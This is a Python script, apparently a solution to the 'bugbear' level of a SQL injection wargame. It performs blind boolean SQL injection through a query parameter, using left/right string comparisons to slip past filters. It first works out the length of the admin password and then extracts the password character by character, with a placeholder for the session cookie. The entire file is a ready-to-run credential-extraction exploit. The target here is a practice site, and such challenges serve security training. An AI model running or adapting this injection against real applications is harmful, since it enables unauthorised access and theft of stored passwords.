import requests


password = ''
password_length = 0

URL = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}


for estimated_length in range(100):
    query={'pw': '1',
           'no': '1||left(id,5)<"admio"&&left(id,5)>"admim"' + '&&length(pw)<' + str(estimated_length)}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if("Hello admin" in res.text):
        password_length = estimated_length - 1
        print("admin's password length is {}".format(password_length))
        break
      
if password_length < 1:
    print("Password length unknown")
    exit()

for current_password_length in range(1, password_length+1) :
    for password_chr in range(ord('0'),ord('z')+1) :        
        query={'pw': '1',
               'no': '1||left(id,5)<"admio"&&left(id,5)>"admim"&&right(left(pw,' + \
               str(current_password_length) +'),1)<"' + chr(password_chr) + '"'}
        
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if("Hello admin" in res.text):
            password = password+chr(password_chr - 1)
            print(password)
            break

if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))